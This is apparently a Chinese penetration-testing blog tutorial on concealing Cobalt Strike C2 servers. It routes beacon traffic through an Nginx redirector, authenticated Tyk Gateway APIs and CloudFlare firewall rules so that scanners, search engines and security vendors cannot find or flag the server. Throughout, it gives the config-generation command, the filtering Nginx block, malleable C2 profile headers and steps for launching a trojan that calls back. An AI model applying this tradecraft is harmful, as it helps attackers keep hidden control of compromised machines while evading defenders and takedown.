伪装隐藏与清理技术总结

  • ​​利用Nginx、Tyk Gateway API和CloudFlare防火墙隐藏C2设施​​
  • ​​自定义配置Nginx文件​​
  • ​​效果​​
  • ​​配置Tyk Gateway API​​
  • ​​创建并配置API​​
  • ​​设置访问验证策略​​
  • ​​配置访问验证Key​​
  • ​​配置C2配置文件​​
  • ​​效果​​
  • ​​配置CloudFlare防火墙​​
  • ​​最终效果​​
  • ​​问题​​

利用Nginx、Tyk Gateway API和CloudFlare防火墙隐藏C2设施

  • Cobalt Strike的特征 被各大安全厂商标记
  • 搜索引擎、空间测绘的扫描

配置C2域名

如果不做好基础设施的隐匿,很快会出现下图的情况。

渗透测试-伪装隐藏与清理痕迹手段_nginx


隐藏C2的手法:

  1. 域前置-许多CDN厂商都已经禁用了域前置技术
  2. 利用云函数隐藏-云函数是有免费额度
    (许多蓝队反制帖子已经开始分享消耗云函数额度的方法)
  3. 利用Tyk Gateway API隐藏C2流量
    通过配置Tyk Gateway API转发恶意流量
    达到类似于域前置,或者腾讯云函数隐藏C2的效果。
  4. 通过将域名托管到CloudFlare
    配置Nginx过滤不符合规则的请求
    并通过配置CloudFlare防火墙只允许Tyk Gateway API的流量访问C2域名,可以达到隐藏C2域名,
    并且防止搜索引擎、空间测绘扫描.和识别Cobalt Strike特征导致域名或IP被标记。

本文基于已经将域名托管到CloudFlare并配置SSL证书的情况.

自定义配置Nginx文件

将域名托管到CloudFlare,可以配置Nginx反向代理来过滤部分请求,只让信标流量转发进服务器。

配置Nginx文件可以使用cs2modrewrite进行生成,然后根据需求进行修改。
​ https://github.com/threatexpress/cs2modrewrite​​

以使用jquery-c2.4.5.profile作为C2配置文件的情况示例:
​ https://github.com/threatexpress/malleable-c2​​

python3 ./cs2nginx.py -i jquery-c2.4.5.profile -c https://127.0.0.1:8443 -r http://www.baidu.com/ -H yourc2.domain > ./nginx.conf


-i:指定C2配置文件
-c:指定内部的监听端口
-r:指定302跳转的地址
-H:指定你的域名

通过该工具生成的Nginx配置文件的server块的部分配置如下:

server {
set $C2_SERVER https://127.0.0.1:8443;
set $REDIRECT_DOMAIN http://www.baidu.com/;
server_name yourc2.domain;
......

listen 80;
listen [::]:80;

listen 443 ssl;
listen [::]:443 ssl;
......

location ~ ^(/jquery-3.3.2.slim.min.js.*|/jquery-3.3.1.min.js.*|/jquery-3.3.1.slim.min.js.*|/jquery-3.3.2.min.js.*)$ {if ( $http_user_agent != "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko")
{
return 404;
}
proxy_pass $C2_SERVER;
......
}
location @redirect {
return 302 $REDIRECT_DOMAIN$request_uri;
}

}

使用Nginx加载该配置文件后。
Nginx将监听外部的80、443端口,并将符合规则的请求转发到内部的8443端口,不符合规则的请求将跳转到http://www.baidu.com/。

效果

此时通过对服务器IP地址的扫描就无法获取到我们的beacon stage了。

渗透测试-伪装隐藏与清理痕迹手段_nginx_02


beacon指的是受害者与我们的teamserver所建立的这个连接,也可以理解成我们所获的的对方主机的控制权。

stager是生成的可执行文件。

stage是无阶段的stager,可以直接理解成,

stage是stager与它所请求的数据的集合体。stage比stager更安全,但是体积更大。

而且在内网穿透的时候基本只能用stage,用stager会十分麻烦,stager是分段传输payload的,使用stager有时候会导致目标无法上线。

stage唯一的缺点是提起相比较而言比较大。

配置Tyk Gateway API

注册账户

​​ https://account.cloud-ara.tyk.io/signup​​ 访问注册地址,填写用户名、邮箱、密码等信息后点击注册,注册成功后选择免费版。

渗透测试-伪装隐藏与清理痕迹手段_apache_03

然后设置组织名称,设置好后会提示Deployment successful。

创建并配置API

点击Manage APIs后会看到如下页面:

渗透测试-伪装隐藏与清理痕迹手段_nginx_04


接下来逐一创建并配置

http-get API、

http-post API、

Stager-x86 API、

Stager-x64 API。

以下以http-get API为例。

假设你的域名为cslabtest.live,且C2配置文件如下:

http-get {

set uri "/api/v2/login";
....
}

http-post {

set uri "/api/v2/status";
....
}
http-stager {
set uri_x86 "/api/v2/GetProfilePicture";
set uri_x64 "/api/v2/GetAttachment";
}

点击Design new API并填写API信息。

渗透测试-伪装隐藏与清理痕迹手段_linux_05


创建好后进一步配置API,来让它能够将请求转发到我们的C2服务器。

现在我们需要更改Listen path和Target URL,

TYK会监听Listen path的地址,并将请求转发到Target URL。

(注:若C2配置文件为jquery-c2.4.5.profile,则将Listen path和Target URL的路径配置为相对应的.js的路径)

渗透测试-伪装隐藏与清理痕迹手段_API_06


为了能够上线CS,还要配置Rate Limiting and Quotas。都选择disable即可。

渗透测试-伪装隐藏与清理痕迹手段_API_07


然后来到Advanced Options,取消勾选Enable caching。

渗透测试-伪装隐藏与清理痕迹手段_linux_08


按这个步骤逐一新建http-get API、http-post API、Stager-x86 API、Stager-x64 API。

设置访问验证策略

将上一步新建的API的Authentication更改为Basic Authentication,如下所示:

渗透测试-伪装隐藏与清理痕迹手段_apache_09


然后来到Policies新建策略,选择你新建的四个API。

渗透测试-伪装隐藏与清理痕迹手段_nginx_10

然后点击Global Limits and Quota,确认禁用Rate Limiting。

渗透测试-伪装隐藏与清理痕迹手段_apache_11


接着配置策略名称并设置密钥过期时间。

渗透测试-伪装隐藏与清理痕迹手段_API_12

点击Create Policy以保存新策略,之后可以在Policies看到它:

渗透测试-伪装隐藏与清理痕迹手段_apache_13

配置访问验证Key

来到Keys,点击ADD KEY,
然后在Apply policy选择我们之前创建的策略,并选择API。

最后来到Authentication输入需要设置的用户名、密码,
这里使用test:testtesttest作为用户名、密码。

渗透测试-伪装隐藏与清理痕迹手段_API_14


Key创建成功后会有如下提示:

渗透测试-伪装隐藏与清理痕迹手段_API_15

配置C2配置文件

由于上一步我们设置了访问验证,
所以要在C2配置文件中添加一个请求头才能正常上线CS。

Authorization的请求头设置格式如下:

Authorization: Basic base64(username:password)

所以按上一步添加的Key,我们要在C2配置文件中添加如下请求头:

Authorization: Basic dGVzdDp0ZXN0dGVzdHRlc3Q=

最终配置文件如下:

http-get {

set uri "/api/v2/login";

client {
header "Authorization" "Basic dGVzdDp0ZXN0dGVzdHRlc3Q=";
}
....
}

http-post {

set uri "/api/v2/status";

client {
header "Authorization" "Basic dGVzdDp0ZXN0dGVzdHRlc3Q=";
}
....
}
http-stager {
set uri_x86 "/api/v2/GetProfilePicture";
set uri_x64 "/api/v2/GetAttachment";

client {
header "Authorization" "Basic dGVzdDp0ZXN0dGVzdHRlc3Q=";
}
....
}

效果

此时直接访问我们设置的API的地址都是需要验证的,而CS是可以正常上线的。

渗透测试-伪装隐藏与清理痕迹手段_nginx_16

配置CloudFlare防火墙

获得tyk.io特征
在CF的WAF中创建一条防火墙规则,如下:

渗透测试-伪装隐藏与清理痕迹手段_apache_17


然后生成一个木马尝试上线CS,这时肯定是无法上线的,来到CF的概述中可以看到所有拦截记录,

点击单条拦截记录查看详细。

渗透测试-伪装隐藏与清理痕迹手段_apache_18


这里有很多的特征可以加到WAF拦截规则中,

来实现只有Tyk Gateway API转发过来的流量才能允许访问,其他的流量都会阻止。

编辑防火墙规则
这里我以ASN为例子,配置如下:

渗透测试-伪装隐藏与清理痕迹手段_linux_19


保存防火墙规则即可。

最终效果

对服务器的扫描,无法获取到我们的beacon stage。

渗透测试-伪装隐藏与清理痕迹手段_API_20


直接访问设置的Tyk Gateway API的地址是需要验证的。

渗透测试-伪装隐藏与清理痕迹手段_API_21


直接访问我们的C2域名会被CloudFlare拦截。

渗透测试-伪装隐藏与清理痕迹手段_apache_22


CS创建监听器,如下:

渗透测试-伪装隐藏与清理痕迹手段_安全_23

CS生成木马,可以正常上线和执行命令。

渗透测试-伪装隐藏与清理痕迹手段_API_24

问题

由于流量经过多次转发,上线可能会有延迟。

通过配置Tyk Gateway API的域名,使用HTTPS的方式上线,
流量中会出现*.tyk.io的DNS流量记录,算是一个比较明显的特征。

渗透测试-伪装隐藏与清理痕迹手段_linux_25